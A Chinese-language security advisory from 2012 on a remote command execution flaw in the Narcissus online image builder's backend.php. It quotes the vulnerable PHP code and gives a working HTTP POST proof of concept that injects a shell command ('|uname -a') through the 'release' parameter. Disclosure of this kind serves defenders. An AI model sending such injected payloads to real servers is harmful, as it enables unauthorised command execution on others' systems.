发布日期:2012-10-30
更新日期:2012-12-04
受影响系统:
angstrom-distribution Narcissus
描述:
--------------------------------------------------------------------------------
Narcissus是在线图像汇编器。
Narcissus在实现上存在安全漏洞,没有正确过滤nartcissus/backend.php内 'release'参数值,可导致远程执行任意系统命令。
<*来源:vendor
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
[ Remote Command Execution ]
#
# File: /narcissus/backend.php ( lines: 10-183 ):
# ..cut..
# if (isset($_POST["action"]) && $_POST["action"] != "") {
# $action = $_POST["action"]; // 1
# } else {
# print "Invalid action: $action";
# exit;
# }
#
# if (isset($_POST["machine"])) {
# $machine = escapeshellcmd(basename($_POST["machine"])); // 2
# } else {
# print "Invalid machine";
# exit;
# }
# ..cut..
# if (isset($_POST["release"]) && $_POST["release"] != "") {
# $release = $_POST["release"]; // 3
# } else {
# $release = "stable";
# }
# ..cut..
# switch($action) {
# ..cut..
# case "configure_image": // 4
# print "configuring\n";
# configure_image($machine, $name, $release); // 5
# break;
# ..cut..
# function configure_image($machine, $name, $release) {
# print "Machine: $machine, name: $name\n";
# passthru ("scripts/configure-image.sh $machine $name-image $release && exit"); // 6 [RCE]
# }
# ..cut..
#
# Vuln:
#
#
# POST /narcissus/backend.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/16.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: pl,en-us;q=0.7,en;q=0.3
# Accept-Encoding: gzip, deflate
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 50
# machine=0&action=configure_image&release=|uname -a
#
### [ dun / 2012 ] #######################################
建议:
--------------------------------------------------------------------------------
厂商补丁:
angstrom-distribution
---------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://github.com/Angstrom-distribution/